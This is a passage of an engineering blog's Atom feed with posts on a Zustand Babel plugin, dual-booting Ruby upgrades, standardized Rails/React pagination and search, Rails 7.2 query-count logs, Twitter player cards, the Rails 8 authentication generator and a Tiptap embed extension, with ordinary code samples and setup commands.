This significantly improves performance. To know how this works, you can refer to this <a href="https://www.bigbinary.com/blog/upgrading-react-state-management-with-zustand">blog post</a>. However, when dealing with many state selections, the code can become verbose and repetitive. For example, consider the following code:</p><pre><code class="language-js">import { shallow } from &quot;zustand/shallow&quot;;

const {
  id,
  name,
  email,
  notifications,
  theme,
  language,
  isAuthenticated,
  apiToken,
  appVersion,
  darkModeEnabled,
} = useSessionStore(
  store =&gt; ({
    id: store[sessionId]?.user.id,
    name: store[sessionId]?.user.name,
    email: store[sessionId]?.user.email,
    notifications: store[sessionId]?.user.notifications,
    theme: store[sessionId]?.user.theme,
    language: store[sessionId]?.user.language,
    isAuthenticated: store[sessionId]?.user.isAuthenticated,
    apiToken: store[sessionId]?.user.apiToken,
    appVersion: store[sessionId]?.user.appVersion,
    darkModeEnabled: store[sessionId]?.user.darkModeEnabled,
  }),
  shallow
);</code></pre><p>This is really repetitive: for each state value, we need to add a line on both the left and right side of the code. Then we thought, what if we could infer the right side from the left side? This would make the code more readable and less error-prone. But this is not possible with custom functions or hooks, because they operate at runtime and cannot modify the structure of the code during transpilation. This is where custom Babel plugins come into play. 
We have built a <a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/docs/zustand-pick.md">Zustand pick transformer</a> capable of generating the boilerplate at the time of transpiling the code.</p><p>If this plugin is added to the Babel configuration, we can rewrite the previous example as:</p><pre><code class="language-js">const {
  id,
  name,
  email,
  notifications,
  theme,
  language,
  isAuthenticated,
  apiToken,
  appVersion,
  darkModeEnabled,
} = useSessionStore.pick([sessionId, &quot;user&quot;]);</code></pre><p>The array inside <code>pick()</code> is the path of the nested object to be accessed. You might also notice that we don't have the <code>import { shallow } from &quot;zustand/shallow&quot;</code> statement in this piece of code. We don't need it. The plugin will automatically add it for us at the time of transpiling.</p><p>The plugin detects that <code>id</code>, <code>name</code>, <code>email</code>, and the other properties are to be accessed from <code>store[sessionId].user</code> in <code>useSessionStore</code>, and it generates the code for it. It will also add optional chaining for all the nested properties automatically to make the picks free from null-pointer errors.</p><p>For more information about the plugin, refer to the <a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/docs/zustand-pick.md">documentation</a>. To see the implementation of the plugin, check the <a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/src/plugins/zustand-pick/index.js">source code</a>.</p><p>We've open-sourced this preset package so that it's accessible for use in your projects as well. To include this preset, install it using the following command:</p><pre><code class="language-bash">yarn add -D @bigbinary/babel-preset-neeto</code></pre><p>And then include it in the Babel configuration:</p><pre><code class="language-json">{
  &quot;presets&quot;: [&quot;@bigbinary/neeto&quot;]
}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Upgrade Ruby using dual boot]]></title>
       <author><name>Vijay Vinod</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-upgrade-using-dual-boot"/>
      <updated>2024-09-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-upgrade-using-dual-boot</id>
<content type="html"><![CDATA[<p>Recently, we upgraded all <a href="https://www.neeto.com/">neeto</a> products' Ruby version from 3.2.2 to 3.3.0 using &quot;dual-booting&quot;.</p><p>Dual-booting is a process that allows you to run your application with different sets of dependencies, making it easy to switch between them. This approach enables you to quickly test your code with both the current and the newer version of what you are upgrading, ensuring that everything works smoothly before fully committing to the upgrade.</p><h4>How to dual-boot Ruby?</h4><p>The dual-boot technique involves maintaining two separate <code>Gemfile.lock</code> files within your Rails project: one for the current version of Ruby and another for the next version you're upgrading to.</p><p>To get started, first create a symbolic link for <code>Gemfile.next</code> with the following command:</p><pre><code class="language-bash">ln -s Gemfile Gemfile.next</code></pre><p>This command creates the <code>Gemfile.next</code> file, which you'll use for the new Ruby version. This file isn't a separate copy but rather a pointer to your original <code>Gemfile</code> in the Rails project directory.</p><p>Next, add the following snippet at the top of your <code>Gemfile</code>:</p><pre><code class="language-ruby">def next?
  File.basename(__FILE__) == &quot;Gemfile.next&quot;
end</code></pre><p>This code snippet helps determine which <code>Gemfile</code> is in use, whether it's the standard one or the <code>Gemfile.next</code> for the new Ruby version.</p><p>Now, let's utilize the <code>next?</code> method to dynamically set the Ruby version in the <code>Gemfile</code> using a conditional operator:</p><pre><code class="language-ruby">ruby_version = next? ? 
&quot;3.3.0&quot; : &quot;3.2.2&quot;
ruby ruby_version</code></pre><p>This code snippet determines the Ruby version based on the <code>next?</code> method. If <code>next?</code> returns true, meaning you're operating within <code>Gemfile.next</code>, it sets the Ruby version to &quot;3.3.0&quot;. Otherwise, if the standard <code>Gemfile</code> is being processed, it defaults to &quot;3.2.2&quot;.</p><h4>How to install dependencies?</h4><p>With the dual-boot setup in place, you can effectively manage dependencies for both your current and next versions of the application.</p><p>Installing current dependencies: To install dependencies for your current version, simply run:</p><pre><code class="language-bash">bundle install</code></pre><p>This command uses the standard <code>Gemfile</code> to resolve and install dependencies for your current application.</p><p>Installing next dependencies: To install dependencies for the next version of your application, use the following command:</p><pre><code class="language-bash">BUNDLE_GEMFILE=Gemfile.next bundle install</code></pre><p>This command specifies <code>Gemfile.next</code> as the <code>Gemfile</code>, allowing you to install dependencies specifically for the next version.</p><p>Managing commands for the next version: To perform various operations for the next version, you can use the syntax <code>BUNDLE_GEMFILE=Gemfile.next &lt;command&gt;</code>. For example, to start the Rails server with the next version's dependencies, you would use:</p><pre><code class="language-bash">BUNDLE_GEMFILE=Gemfile.next rails s</code></pre><p>This approach ensures that <code>Gemfile.next</code> is explicitly used for the specified command, allowing you to work with the next version of your application while keeping dependencies and configurations correctly managed.</p><h4>Considerations for dual-boot setup</h4><p>When implementing a dual-boot setup, it's crucial to consider where both Ruby and gem versions are defined. 
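The same switch is not limited to the Ruby version; it can vary any dependency during the upgrade window. Below is a hedged, stand-alone sketch of the predicate from this post (in a real Gemfile the `ruby` and `gem` DSL calls would consume these values; here we only compute them so the logic is visible, and `some_gem` is a hypothetical name):

```ruby
# Sketch of the dual-boot switch. `next?` is true only when Bundler is
# evaluating this file through the Gemfile.next symlink.
def next?
  File.basename(__FILE__) == "Gemfile.next"
end

ruby_version = next? ? "3.3.0" : "3.2.2"

# The same predicate could pin a gem differently while upgrading, e.g.:
#   gem "some_gem", next? ? "~> 2.0" : "~> 1.9"
puts ruby_version
```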
While gem versions are usually specified only in the <code>Gemfile</code>, the Ruby version can be defined in several locations. The most common are:</p><ul><li><code>.ruby-version</code> file: Used by version managers like rbenv to specify the Ruby version.</li><li><code>Gemfile</code>: This is where Bundler, RVM, Heroku, and similar tools reference the Ruby version to manage the Ruby environment.</li><li><code>Gemfile.lock</code>: Although the Ruby version in this file is mostly informative, it's worth noting.</li><li><code>Dockerfile</code>: Defines the Ruby version for Docker containers if you're using Docker.</li><li>CI setup steps and configurations.</li><li>Other less common locations within applications.</li></ul><p>We need to make sure that the dual-boot setup is compatible with all of them to ensure a smooth transition and consistency across different environments.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Simplifying code with standardized pagination, sorting, and search]]></title>
       <author><name>Abilash Sajeev</name></author>
      <link href="https://www.bigbinary.com/blog/standardize-pagination-keywords"/>
      <updated>2024-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/standardize-pagination-keywords</id>
<content type="html"><![CDATA[<p><a href="https://www.neeto.com">Neeto</a> is a collection of products. Here, we standardize boilerplate and repetitive code into <a href="https://blog.neeto.com/p/nanos-make-neeto-better">Nanos</a>. The search, sorting, and pagination functionalities are essential for every listing page. We realized that each product had its own custom implementations for these operations, resulting in a lot of duplicated code. We wanted this logic to be abstracted and handled uniformly.</p><h2>Sorting and pagination</h2><p>If you have worked with tables, you may already be familiar with the following code. In this example, we are using the <a href="https://neeto-ui.neeto.com/?path=/docs/components-table--docs">Table</a> component from <a href="https://neeto-ui.neeto.com/">NeetoUI</a>. It is the developer's responsibility to handle the sorting and pagination logic, make the API calls with an updated payload, and ensure that the URL is updated accordingly.</p><pre><code class="language-javascript">import React, { useState } from &quot;react&quot;;
import { Table } from &quot;@bigbinary/neetoui&quot;;

const Teams = () =&gt; {
  const [page, setPage] = useState(1);
  const [sortBy, setSortBy] = useState(null);
  const [orderBy, setOrderBy] = useState(null);

  const handleSort = ({ sortBy, orderBy }) =&gt; {
    setSortBy(sortBy);
    setOrderBy(orderBy);
    // Custom sort logic
  };

  const handlePageChange = page =&gt; {
    setPage(page);
    // Custom pagination logic.
  };

  const { data: teams, isLoading } = useFetchTeams({ page, sortBy, orderBy });

  return (
    &lt;Table
      currentPageNumber={page}
      handlePageChange={handlePageChange}
      onChange={(_, __, sorter) =&gt; handleSort(sorter)}
      {...{ totalCount, rowData, columnData, ...otherProps }}
    /&gt;
  );
};

export default Teams;</code></pre><p>To make both the frontend and backend more standardized and reusable, we established some conventions. 
The NeetoUI Table will handle both sorting and pagination internally. When the user navigates to a different page, NeetoUI will update the <code>page</code> and <code>page_size</code> query parameters in the URL.</p><p>Similarly, when a column is sorted, the <code>sort_by</code> and <code>order_by</code> query parameters are updated. We no longer need a dedicated state to store these values. When a query parameter changes, the API will be called with the modified payload.</p><p>Here is what the simplified code looks like:</p><pre><code class="language-javascript">import React from &quot;react&quot;;
import { Table } from &quot;@bigbinary/neetoui&quot;;
import { useQueryParams } from &quot;@bigbinary/neeto-commons-frontend/react-utils&quot;;

const Teams = () =&gt; {
  const { page, sortBy, orderBy } = useQueryParams();
  const { data: teams, isLoading } = useFetchTeams({ page, sortBy, orderBy });

  return (
    &lt;Table {...{ totalCount, rowData, columnData, ...otherProps }} /&gt;
  );
};

export default Teams;</code></pre><p>Here, we utilize a <code>useQueryParams</code> utility helper. It parses the URL and returns the query parameters after converting them to camel case.</p><p>We noticed that a similar cleanup could be done on the backend side. After establishing a consistent variable naming convention for <code>page</code>, <code>page_size</code>, <code>order_by</code>, and <code>sort_by</code> in every listing page, it became easier to create common utility functions for the backend. 
Here's what it looks like:</p><pre><code class="language-ruby">module Filterable
  extend ActiveSupport::Concern
  include Pagy::Backend

  def sort_and_paginate(records)
    sorted_records = apply_sort(records)
    apply_pagination(sorted_records)
  end

  def apply_sort(records)
    records.order(sort_by =&gt; order_by)
  end

  def sort_by
    params[:sort_by].presence || &quot;created_at&quot;
  end

  def order_by
    case params[:order_by]&amp;.downcase
    when &quot;asc&quot;, &quot;ascend&quot;
      &quot;ASC&quot;
    when &quot;desc&quot;, &quot;descend&quot;
      &quot;DESC&quot;
    else
      &quot;ASC&quot;
    end
  end

  def apply_pagination(records)
    pagination_method = records.is_a?(ActiveRecord::Relation) ? :pagy : :pagy_array
    pagy, paginated_records = send(pagination_method, records, page: params[:page], items: params[:page_size])

    [pagy, paginated_records]
  end
end</code></pre><p>The <code>apply_pagination</code> helper method can be used to paginate the results. It uses the <code>Pagy</code> gem internally to perform the pagination. Pagy provides a generic method <code>pagy</code> that works with <code>ActiveRecord</code> out of the box. It also provides a <code>pagy_array</code> method, which paginates an array of records. Both these methods return a <code>Pagy</code> instance along with the paginated records.</p><p>The <code>apply_sort</code> method sorts the given records based on a specified column name and direction. By default, records are sorted in ascending order of <code>created_at</code> timestamps, but this can be customized by specifying values for the <code>sort_by</code> and <code>order_by</code> params. As sorting and pagination are common requirements of listing pages, we also added a <code>sort_and_paginate</code> method, which performs both these operations on the provided records.</p><h2>Searching</h2><p>Searching is a common functionality in any web application. Developers need to ensure that the results are refetched whenever the search term changes. 
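The idea behind debouncing the refetch can be sketched in a few lines of plain JavaScript. This stand-alone version only illustrates the mechanism; the products use the useDebounce hook from neeto-commons-frontend shown in the snippet that follows:

```javascript
// Minimal debounce sketch: rapid calls collapse into a single trailing
// invocation after `delay` ms of silence (illustrative only).
const debounce = (fn, delay = 300) => {
  let timer;
  return (...args) => {
    clearTimeout(timer);
    timer = setTimeout(() => fn(...args), delay);
  };
};

// Simulate a user typing quickly: only one "API call" fires.
let apiCalls = 0;
const search = debounce(() => { apiCalls += 1; }, 50);
search("n"); search("ne"); search("neeto");
setTimeout(() => console.log(apiCalls), 150); // logs 1
```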
The debouncing logic is added to minimize API requests and improve user experience. As you can see in the snippet below, we had to maintain a dedicated state for the search term as well.</p><pre><code class="language-javascript">import React, { useState } from &quot;react&quot;;
import { Input } from &quot;@bigbinary/neetoui&quot;;
import { useDebounce } from &quot;@bigbinary/neeto-commons-frontend/react-utils&quot;;
import { useFetchTeams } from &quot;hooks/reactQuery/useFetchTeamsApi&quot;;

const Teams = () =&gt; {
  const [searchString, setSearchString] = useState(&quot;&quot;);
  const debouncedSearchString = useDebounce(searchString.trim());
  const { data: teams, isLoading } = useFetchTeams(debouncedSearchString);

  return (
    &lt;Input
      type=&quot;search&quot;
      value={searchString}
      onChange={({ target: { value } }) =&gt; setSearchString(value)}
    /&gt;
  );
};

export default Teams;</code></pre><p>As we standardized the naming pattern for the search term, we were able to directly incorporate the search term value into the URL query parameters. This helped us retrieve the search term, eliminating the need for a separate state.</p><p>We also introduced a new component in <a href="https://neeto-molecules.neeto.com">NeetoMolecules</a> to handle the search functionality in all products. This <a href="https://neeto-molecules.neeto.com/?path=/docs/search--docs">Search</a> component will internally handle the debounced updates when the search term changes. It will also update the <code>search_term</code> query param in the URL. 
Here is what the simplified code looks like:</p><pre><code class="language-javascript">import React from &quot;react&quot;;
import Search from &quot;@bigbinary/neeto-molecules/Search&quot;;
import { useQueryParams } from &quot;@bigbinary/neeto-commons-frontend/react-utils&quot;;
import { useFetchTeams } from &quot;hooks/reactQuery/useFetchTeamsApi&quot;;

const Teams = () =&gt; {
  const { searchTerm = &quot;&quot; } = useQueryParams();
  const { data: teams, isLoading } = useFetchTeams(searchTerm);

  return &lt;Search /&gt;;
};

export default Teams;</code></pre><p>We also updated the <code>Filterable</code> concern mentioned earlier to simplify the logic on the backend. The <code>search_term</code> method retrieves the keyword specified in the URL query parameters, while <code>search?</code> checks whether the results should be filtered based on any keyword.</p><pre><code class="language-ruby">module Filterable
  extend ActiveSupport::Concern

  # ... previous code

  def search_term
    filter_params[:search_term]
  end

  def search?
    search_term.present?
  end
end</code></pre><p>Let's consolidate everything in the <code>TeamsController</code>. In the following code, we need to fetch all the teams belonging to an organization, filter them based on the search term, and return the results after sorting and pagination.</p><pre><code class="language-ruby">def index
  if params[:search_string].present?
    @teams = @organization.teams.filter_by_name(params[:search_string])
  end

  @teams = @teams
    .order(params[:column] =&gt; params[:direction])
    .page(params[:current_page])
    .per(params[:limit])
end</code></pre><p>We were able to simplify this logic with the help of the methods provided by the <code>Filterable</code> concern. As you can see below, this helped us remove a lot of boilerplate code and improve readability.</p><pre><code class="language-ruby">def index
  @teams = @organization.teams.filter_by_name(search_term) if search?
  @teams = sort_and_paginate(@teams)
end</code></pre><p>This standardized approach helped us extract and centralize the common logic. It also accelerated the development and maintenance cycle, as the code structure is now clear and consistent across all the products.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.2 brings SQL queries count to template rendering logs]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-adds-sql-queries-count-to-template-rendering-logs"/>
      <updated>2024-08-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-adds-sql-queries-count-to-template-rendering-logs</id>
<content type="html"><![CDATA[<p>For Rails developers, debugging database queries is a frequent task. Whether it's addressing the notorious N+1 query problem or fine-tuning caching strategies, developers often find themselves diving into logs to scrutinize SQL query counts.</p><p>Traditionally, this involved manually inspecting the logs and counting the number of queries. Needless to say, this becomes tedious and error-prone for actions generating a significant number of queries, in the order of tens or hundreds.</p><p>Thankfully, Rails 7.2 introduces a helpful improvement by enhancing the log output to include the query count alongside existing information.</p><p><img src="/blog_images/2024/rails-8-adds-sql-queries-count-to-template-rendering-logs/sql-query-count-in-template-log.gif" alt="sql-query-count-in-template-log"></p><p>The improved log output now includes the query count within the ActiveRecord section. It shows <code>3 queries, 1 cached</code>, indicating that three database queries were executed, with one being served from the cache.</p><p>This seemingly small addition allows for quick identification of query volume and potential optimization areas. You can easily see if caching is working effectively and if the number of queries aligns with expectations, saving developers valuable time and effort.</p><p>Check <a href="https://github.com/rails/rails/pull/51457">this pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Twitter player cards to improve accessibility of NeetoRecord]]></title>
       <author><name>Bonnie Simon</name></author>
      <link href="https://www.bigbinary.com/blog/adding-twitter-player-cards-to-neetorecord"/>
      <updated>2024-08-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/adding-twitter-player-cards-to-neetorecord</id>
<content type="html"><![CDATA[<p>At Neeto, we're building multiple products, and we love sharing our progress and updates on Twitter. We often accompany our tweets with NeetoRecord recordings to give you an even closer look at our work. However, we noticed that users had to leave Twitter to view our videos, creating unnecessary friction in their experience.</p><h4>The Problem</h4><p>Initially, when we shared a NeetoRecord video on Twitter, this is how the tweet would appear.</p><p><img src="/blog_images/2024/adding-twitter-player-cards-to-neetorecord/no-embed.png" alt="Link with no embed"></p><p>As we can see, the links are just plain text, lacking visual appeal and context. Users had to click away from Twitter and open a new tab to view the recording. This extra step not only disrupted the user's Twitter experience but also likely reduced the number of people who actually watched our videos.</p><h4>The Solution: Twitter Cards</h4><p>To address this issue, we turned to Twitter Cards. Similar to Facebook's Open Graph protocol, Twitter Cards allow us to showcase interactive media directly within tweets. While both protocols serve similar purposes, Twitter Cards are designed to work directly in Twitter, so its crawler will look for these tags first and fall back to OG tags only when they are absent.</p><h4>What are Twitter Cards?</h4><p>Twitter Cards are a set of meta tags that enable us to embed interactive content in a tweet. In our case, we want to provide users an embedded video player which they can use to view the NeetoRecord recording without leaving Twitter. It's not just about aesthetics. 
According to Twitter's own data, &quot;tweets with cards have 43% higher engagement rates than regular tweets with links.&quot; This statistic underscores the impact of providing a seamless, visually appealing experience.</p><h4>Implementing Twitter Cards for NeetoRecord</h4><p>There are multiple types of cards that we can leverage to enhance our content, such as summary cards, player cards &amp; app cards. However, in this post, we are going to discuss Player Cards, which is the type implemented in NeetoRecord. This card type allows us to embed an interactive video player directly in the tweet. Here's how it looks:</p><p><img src="/blog_images/2024/adding-twitter-player-cards-to-neetorecord/player-embed.png" alt="Embed player"></p><p>Clicking on this link preview will open our embedded content, in this case, a player to view the recording directly within Twitter.</p><p><img src="/blog_images/2024/adding-twitter-player-cards-to-neetorecord/player-embed-expanded.png" alt="Expanded player"></p><p>As we can see, users can now watch our NeetoRecord videos without leaving Twitter. This seamless experience has several benefits:</p><ul><li>Higher Engagement: With the video right there in the tweet, more users are likely to watch it.</li><li>Reduced Friction: No more clicking away or opening new tabs, keeping users engaged with our content and the Twitter conversation.</li><li>Better Branding: The Player Card includes our logo and video title, reinforcing our brand with every view.</li></ul><h4>Technical Implementation</h4><p>Implementing Twitter Cards is straightforward. We added meta tags to the <code>&lt;head&gt;</code> section of our web page. 
For our Player Card, we use tags as shown below.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:card&quot; content=&quot;player&quot; /&gt;
&lt;meta
  property=&quot;twitter:url&quot;
  content=&quot;https://oli.neetorecord.com/watch/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;
/&gt;
&lt;meta
  property=&quot;twitter:title&quot;
  content=&quot;Introducing the new video player for NeetoRecord&quot;
/&gt;
&lt;meta property=&quot;twitter:site&quot; content=&quot;@NeetoRecord&quot; /&gt;
&lt;meta property=&quot;twitter:image&quot; content=&quot;https://cdn.neeto.com/hycoe7&quot; /&gt;
&lt;meta
  property=&quot;twitter:player&quot;
  content=&quot;https://oli.neetorecord.com/embeds/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;
/&gt;
&lt;meta property=&quot;twitter:player:width&quot; content=&quot;1280&quot; /&gt;
&lt;meta property=&quot;twitter:player:height&quot; content=&quot;720&quot; /&gt;</code></pre><p>These tags tell Twitter's crawler what to display in the card.</p><p>Let's break down the purpose and importance of each meta tag:</p><pre><code class="language-html">&lt;meta property=&quot;twitter:card&quot; content=&quot;player&quot; /&gt;</code></pre><p>This tag specifies the card type. Setting it to &quot;player&quot; tells Twitter that this is a Player Card, which is designed for video or audio content.</p><pre><code class="language-html">&lt;meta
  property=&quot;twitter:url&quot;
  content=&quot;https://oli.neetorecord.com/watch/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;
/&gt;</code></pre><p>This tag provides the URL of the web page that the card is describing. 
It should be the page where users can view the full content.</p><pre><code class="language-html">&lt;meta
  property=&quot;twitter:title&quot;
  content=&quot;Introducing the new video player for NeetoRecord&quot;
/&gt;</code></pre><p>This tag sets the title of the card, which appears as the main headline.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:site&quot; content=&quot;@NeetoRecord&quot; /&gt;</code></pre><p>This tag specifies the Twitter @username the card should be attributed to.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:image&quot; content=&quot;https://cdn.neeto.com/hycoe7&quot; /&gt;</code></pre><p>This tag provides the image to be displayed in place of the player on platforms that don't support iframes or inline players.</p><pre><code class="language-html">&lt;meta
  property=&quot;twitter:player&quot;
  content=&quot;https://oli.neetorecord.com/embeds/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;
/&gt;</code></pre><p>This crucial tag specifies the URL of the video player. It should be an HTTPS URL to an iframe player that can play the content.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:player:width&quot; content=&quot;1280&quot; /&gt;
&lt;meta property=&quot;twitter:player:height&quot; content=&quot;720&quot; /&gt;</code></pre><p>These two tags define the width and height of the video player iframe, in pixels. They help ensure the video displays correctly in the Twitter feed.</p><h4>Conclusion</h4><p>Twitter Cards have improved how NeetoRecord videos are shared on Twitter. The embedded media experience reduces friction and increases engagement, while enhancing our brand visibility.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 8 introduces a basic authentication generator]]></title>
       <author><name>Jaimy Simon</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-introduces-a-basic-authentication-generator"/>
      <updated>2024-08-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-introduces-a-basic-authentication-generator</id>
      <content type="html"><![CDATA[<p>DHH recently posted the following in an issue titled <a href="https://github.com/rails/rails/issues/50446">Add basic authentication generator</a>.</p><blockquote><p>Rails now include all the key building blocks needed to do basic authentication, but many new developers are still uncertain of how to put them together, so they end up leaning on all-in-one gems that hide the mechanics.</p></blockquote><p>To address this, Rails 8 has introduced a generator that simplifies the addition of basic authentication to Rails applications. In this blog post, we'll explore the components included in this authentication scaffold.</p><h2>Adding authentication to your Rails application</h2><p>To set up a basic authentication system in your Rails application, execute the following command.</p><pre><code class="language-bash">bin/rails generate authentication</code></pre><p>This command generates a set of essential files that provide a foundational start for implementing authentication, including support for database-tracked sessions and password reset functionality. Here is the <a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3">gist</a> of the generated scaffold.</p><p>Let's examine the components created by the authentication generator.</p><h3>Models &amp; migrations</h3><p>To lay the groundwork for handling user accounts and session management, the models <a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-user-rb"><code>User</code></a>, <a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-current-rb"><code>Current</code></a> and <a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-session-rb"><code>Session</code></a> are set up along with their corresponding migrations. 
This setup includes:</p><ul><li><p><a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-xxxxxxx_create_users-rb"><code>CreateUsers</code></a> migration: It creates a <code>users</code> table, with a uniquely indexed <code>email_address</code> field and <code>password_digest</code> for storing the securely hashed passwords using <a href="https://api.rubyonrails.org/v5.2/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password"><code>has_secure_password</code></a>.</p></li><li><p><a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-xxxxxxx_create_sessions-rb"><code>CreateSessions</code></a> migration: It sets up the <code>sessions</code> table, which includes a unique <code>token</code> field, along with <code>ip_address</code> and <code>user_agent</code> fields to record the user's device and network details. The <code>Session</code> model uses <a href="https://api.rubyonrails.org/v7.1.3.4/classes/ActiveRecord/SecureToken/ClassMethods.html"><code>has_secure_token</code></a> to generate unique session tokens.</p></li><li><p>The <code>Current</code> model manages per-request state and provides access to the current user's information through a delegated <code>user</code> method.</p></li><li><p>Additionally, the <a href="https://github.com/bcrypt-ruby/bcrypt-ruby">bcrypt</a> gem is added to the Gemfile. If this gem is not present, it is added; if it is commented, it is uncommented, and then <code>bundle install</code> is run to install the gem.</p></li></ul><h3>Authentication concern</h3><p>The core authentication logic and session management are encapsulated in the <a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-authentication-rb"><code>Authentication</code></a> concern.</p><ul><li><p><code>require_authentication</code>: This is a <code>before_action</code> callback which attempts to restore an existing session with <code>resume_session</code>. 
If no session is found, it redirects the user to the login page using <code>request_authentication</code>.</p></li><li><p><code>resume_session</code>: Retrieves a session using a signed token from the cookie via the <code>find_session_by_cookie</code> method. Sets it as the current session, and saves the token in a permanent, HTTP-only cookie using the <code>set_current_session</code> method.</p></li><li><p><code>authenticated?</code>: A helper method that checks if the current user has an active session.</p></li><li><p><code>allow_unauthenticated_access</code>: This class method allows specific actions to bypass the <code>require_authentication</code> callback.</p></li><li><p><code>after_authentication_url</code>: Returns the URL to redirect to after authentication.</p></li><li><p><code>start_new_session_for(user)</code>: Creates a new session for the given user with details of the user's device and IP address and then sets the current session.</p></li><li><p><code>terminate_session</code>: Destroys the current session and removes the session token from cookies.</p></li></ul><h3>Managing sessions</h3><p>The <a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-sessions_controller-rb"><code>SessionsController</code></a> handles user session management and includes the following actions:</p><ul><li><p><code>new</code>: Renders a login form for the user credentials. The <a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-sessions_new-html-erb"><code>new.html.erb</code></a> file includes fields for email and password, displays flash messages for success and errors, and provides a link for password recovery.</p></li><li><p><code>create</code>: Authenticates the user with the provided credentials. 
On success, it creates a new session and redirects to the <code>after_authentication_url</code>; on failure, it redirects to the login form with an error message.</p></li><li><p><code>destroy</code>: Terminates the user's session and redirects to the login form.</p></li></ul><p>Combining all of this, a basic authentication flow would look like this.</p><p><img src="/blog_images/2024/rails-8-introduces-a-basic-authentication-generator/user-authentication.png" alt="Flow of a basic authentication system"></p><h3>Password reset functionality</h3><p>The basic password reset functionality includes initiating a password reset request, dispatching reset instructions via email, and updating the password. The <a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-passwords_controller-rb"><code>PasswordsController</code></a> manages these actions as follows:</p><ul><li><p><code>new</code>: Displays the form to request a password reset using the <a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-passwords_new-html-erb"><code>new.html.erb</code></a> template.</p></li><li><p><code>create</code>: Handles the reset request, sends a reset email via the <a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-passwords_mailer-rb"><code>PasswordMailer</code></a> if the user exists, and redirects with a notice. This email contains a link to the password reset page, which includes a <code>password_reset_token</code> as a parameter. The <code>password_reset_token</code> is part of the <a href="https://github.com/rails/rails/pull/52483">newly added configuration</a> to <code>has_secure_password</code>. 
It has a default expiration period of 15 minutes.</p></li><li><p><code>edit</code>: Renders the <a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-edit-html-erb"><code>edit.html.erb</code></a> template to set a new password.</p></li><li><p><code>update</code>: Updates the user's password, redirects on success, or shows an alert on failure.</p></li><li><p><code>set_user_by_token</code>: It is the <code>before_action</code> callback for the <code>edit</code> and <code>update</code> actions, which retrieves the user based on the <code>password_reset_token</code> provided in the request parameters, ensuring proper identification of the user.</p><p>Putting these together, the flow of resetting the password would be as follows:</p></li></ul><p><img src="/blog_images/2024/rails-8-introduces-a-basic-authentication-generator/password-reset.png" alt="Flow of password reset"></p><h2>Current limitations and considerations</h2><p>The current authentication generator supports email-password login for existing users but does not handle new account creation. Future updates may incorporate user account creation and other customizations.</p><p>Please check out the following pull requests for more details:</p><ul><li>https://github.com/rails/rails/pull/52328</li><li>https://github.com/rails/rails/pull/52472</li><li>https://github.com/rails/rails/pull/52483</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Building custom extensions in Tiptap]]></title>
       <author><name>Gaagul C Gigi</name></author>
      <link href="https://www.bigbinary.com/blog/building-custom-extensions-in-tiptap"/>
      <updated>2024-08-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/building-custom-extensions-in-tiptap</id>
      <content type="html"><![CDATA[<p><a href="https://neeto-editor.neeto.com">neetoEditor</a> is a rich text editor used across <a href="https://neeto.com">neeto</a> products. It is built on Tiptap, an open-source headless content editor, and offers a seamless and customizable solution for rich text editing.</p><p>The decision to use Tiptap as the foundational framework for neetoEditor is based on its flexibility. Tiptap simplifies the complex Prosemirror syntax into simple JavaScript classes. In this blog post, we'll walk you through the process of building an Embed extension using Tiptap.</p><h2>What is the Embed extension?</h2><div style="width:100%;max-width:600px;margin:auto;"><img width="100" alt="embed-extension" src="/blog_images/2024/building-custom-extensions-in-tiptap/embed-youtube-video.gif"></div><p>The Embed extension enables embedding of videos from YouTube, Vimeo, Loom and <a href="https://neeto.com/neetorecord">NeetoRecord</a>.</p><h2>Implementation</h2><p>If you think of the document as a tree, every content type in Tiptap is a Node. Examples of nodes include paragraphs, headings, and code blocks. Here, we are creating a new &quot;embed&quot; node.</p><pre><code class="language-jsx">import { Node } from &quot;@tiptap/core&quot;;

export default Node.create({
